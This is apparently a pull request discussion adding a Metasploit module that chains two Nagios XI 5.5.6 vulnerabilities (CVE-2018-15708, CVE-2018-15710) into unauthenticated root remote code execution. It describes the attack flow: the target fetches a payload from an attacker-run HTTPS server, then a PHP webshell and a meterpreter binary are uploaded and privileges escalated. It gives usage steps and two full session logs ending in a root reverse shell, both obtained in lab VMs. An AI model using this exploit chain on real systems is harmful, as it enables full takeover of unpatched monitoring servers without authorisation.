Add Nagios XI 5.5.6 Root Remote Code Execution Module

[yaumn]

Add Nagios XI 5.5.6 Root Remote Code Execution Module

This module exploits two vulnerabilities in Nagios 5.5.6:
  - CVE 2018-15708 which allows for unauthenticated remote code execution
  - CVE 2018–15710 which allows for local privilege escalation.
When combined, these two vulnerabilities give us a root reverse shell.

The exploit works as follows:
- A local HTTPS server is setup. When it is reached, this server responds with a payload.
- By crafting a malicious request, we make the target host send a request to our HTTPS server. Therefore, the local HTTPS server must be reachable from outside your private network (except if the Nagios server is in the same network as yours obviously), this is what the RSRVHOST and RSRVPORT options are for. The malicious request allows for file upload. A PHP webshell and a meterpreter executable are uploaded.
- A command is executed thanks to the webshell. This command elevates privileges and run the meterpreter executable, giving us a meterpreter session.

Verification

To test the exploit, I used Ubuntu 18.04 LTS x64 in a VM and I installed Nagios XI 5.5.6 from the official website (https://www.nagios.com/downloads/nagios-xi/older-releases/).

• Start msfconsole
• use exploit/linux/http/nagios_xi_root_rce
• set RHOSTS IP
• set RSRVHOST IP
• exploit
• Verify you get a root shell

Scenarios

msf5 > use exploit/linux/http/nagios_xi_root_rce 
msf5 exploit(linux/http/nagios_xi_root_rce) > set RHOSTS 192.168.0.57
RHOSTS => 192.168.0.57
msf5 exploit(linux/http/nagios_xi_root_rce) > set RSRVHOST 192.168.0.50
RSRVHOST => 192.168.0.50
msf5 exploit(linux/http/nagios_xi_root_rce) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.0.50:4444 
[*] Using URL: https://0.0.0.0:8080/yXgRPrO9L8zIt
[*] Local IP: https://192.168.0.50:8080/yXgRPrO9L8zIt
[*] Server started.
[*] webshell.php uploaded with success!
[*] Using URL: https://0.0.0.0:8080/oDRVURAY82YcT
[*] Local IP: https://192.168.0.50:8080/oDRVURAY82YcT
[*] Server started.
[*] meterpreter uploaded with success!
[*] Sending stage (985320 bytes) to 192.168.0.57
[*] Meterpreter session 1 opened (192.168.0.50:4444 -> 192.168.0.57:33162) at 2019-06-16 23:44:34 +0100
[+] Deleted /usr/local/nagvis/share/webshell.php
[+] Deleted /usr/local/nagvis/share/meterpreter
[!] This exploit may require manual cleanup of '/var/tmp/shell.nse' on the target
[*] Server stopped.

msf5 exploit(linux/http/nagios_xi_root_rce) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : 192.168.0.57
OS           : Ubuntu 18.04 (Linux 4.18.0-21-generic)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter >

[wchen-r7]

Sorry for the wait. For some reason I ended up going down some silly path trying to install Nagios XI, but it turned out to be actually easy. Anyways, the module works fine for me:

msf5 exploit(linux/http/nagios_xi_root_rce) > check
[*] 172.16.135.129:443 - The target appears to be vulnerable.
msf5 exploit(linux/http/nagios_xi_root_rce) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 172.16.135.1:4444 
msf5 exploit(linux/http/nagios_xi_root_rce) > [*] Using URL: https://0.0.0.0:8080/0sSXoIkeTo2
[*] Local IP: https://192.168.0.21:8080/0sSXoIkeTo2
[*] Server started.
[*] webshell.php uploaded with success!
[*] Using URL: https://0.0.0.0:8080/1vmZQikrphTQHf6
[*] Local IP: https://192.168.0.21:8080/1vmZQikrphTQHf6
[*] Server started.
[*] meterpreter uploaded with success!
[*] Sending stage (985320 bytes) to 172.16.135.129
[*] Meterpreter session 1 opened (172.16.135.1:4444 -> 172.16.135.129:58494) at 2019-06-24 23:58:00 -0500
[+] Deleted /usr/local/nagvis/share/webshell.php
[+] Deleted /usr/local/nagvis/share/meterpreter
[!] This exploit may require manual cleanup of '/var/tmp/shell.nse' on the target
[*] Server stopped.

msf5 exploit(linux/http/nagios_xi_root_rce) > sessions

Active sessions
===============

  Id  Name  Type                   Information                                    Connection
  --  ----  ----                   -----------                                    ----------
  1         meterpreter x86/linux  uid=0, gid=0, euid=0, egid=0 @ 172.16.135.129  172.16.135.1:4444 -> 172.16.135.129:58494 (172.16.135.129)

msf5 exploit(linux/http/nagios_xi_root_rce) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > pwd
/usr/local/nagvis/share
meterpreter > 

But I'll do a little touch up here and there to clean up the code a little bit (don't worry, just minor stuff!). And then I will land this pull request. Thank you @yaumn. It's a really cool module! :-)

[yaumn]

No problem, thank you for your time!

[wchen-r7]

Release Notes

The Nagios XI 5.5.6 Root RCE module has been added to the framework. It exploits two vulnerabilities in Nagios 5.5.6. The first is CVE-2018-15708, which allows for unauthenticated remote code execution. The second is CVE-2018–15710, which allows for local privilege escalation.
When combined, these two vulnerabilities give us a root reverse shell.

[wchen-r7]

Some changes I made:

• Module's filename changed to nagios_xi_magpie_debug.
• Make the names of the files the exploit is uploading random.
• Module documentation
• Other cosmetic changes (like spacing)